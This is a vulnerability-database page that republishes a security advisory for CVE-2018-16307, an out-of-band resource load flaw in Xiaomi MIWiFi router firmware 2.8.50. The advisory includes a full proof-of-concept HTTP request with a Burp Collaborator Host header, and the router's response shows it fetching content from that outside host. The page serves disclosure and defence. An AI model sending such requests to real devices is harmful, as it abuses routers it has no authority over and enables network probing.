Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MIWiFi Xiaomi_55DD 2.8.50 Out-Of-Band Resource Load

🗓️ 02 Sep 2018 00:00:00Reported by Mishra DhirajType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 90 Views

Xiaomi MIWiFi Xiaomi_55DD 2.8.50 Out-Of-Band Resource Load CVE-2018-16307

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Xiaomi MIWiFi Xiaomi_55DD 2.8.50 Out-Of-Band Resource Load Vulnerability
3 Sep 201800:00
zdt
CNVD		Xiaomi MIWiFi Xiaomi_55DD Resource Loading Vulnerability
4 Sep 201800:00
cnvd
CVE		CVE-2018-16307
5 Sep 201821:00
cve
Cvelist		CVE-2018-16307
5 Sep 201821:00
cvelist
EUVD		EUVD-2018-8158
7 Oct 202500:30
euvd
NVD		CVE-2018-16307
5 Sep 201821:29
nvd
OSV		CVE-2018-16307
5 Sep 201821:29
osv
Prion		Design/Logic Flaw
5 Sep 201821:29
prion
`CVE: CVE-2018-16307  
Issue: Out-of-band resource load  
Product affected: MIWiFi Xiaomi_55DD Version 2.8.50  
  
Summary:  
An "Out-of-band resource load" issue was discovered on Xiaomi MIWiFi Xiaomi_55DD Version 2.8.50 devices. It is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response. If a domain name (containing a random string) is used in the HTTP Host header, the application performs an HTTP request to the specified domain. The response from that request is then included in the application's own response.  
  
## Request  
  
POST /cgi-bin/luci/api/xqsystem/login HTTP/1.1  
Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0  
Accept: */*  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.31.1/cgi-bin/luci/web/home  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 126  
Cookie: __guid=86847064.3826147368769525000.1535781606575.13; monitor_count=9; psp=admin|||2|||0  
Connection: close  
  
username=admin&password=b2e8d6e552db587f3c283ce59c4d08fcbaf2cc9e&logtype=2&nonce=0_4c%3Abb%3A58%3A47%3A39%3A84_1535785091_2732  
  
## Response  
  
HTTP/1.1 200 OK  
Content-Type: text/html  
Content-Length: 62  
Connection: close  
Server: Burp Collaborator https://burpcollaborator.net/  
X-Collaborator-Version: 4  
Expires: Thu, 01 Jan 1970 00:00:01 GMT  
Cache-Control: no-cache  
MiCGI-Switch: 1 0  
MiCGI-TproxyInfo: 192.168.31.1:80  
MiCGI-Upstream: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net  
MiCGI-Client-Ip: 192.168.31.237  
MiCGI-Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net  
MiCGI-Http-Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net  
MiCGI-Server-Ip: 192.168.31.1  
MiCGI-Server-Port: 80  
MiCGI-Status: AUTOPROXY  
MiCGI-Preload: no  
  
<html><body>x4e809xt6zpgky5b16f6dezjlglgkugifigz</body></html>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Sep 2018 00:00Current
7.7High risk
Vulners AI Score7.7
EPSS0.00285
xiaomimiwifiout-of-band resource loadcve-2018-16307security issueburp collaboratorhttp request
90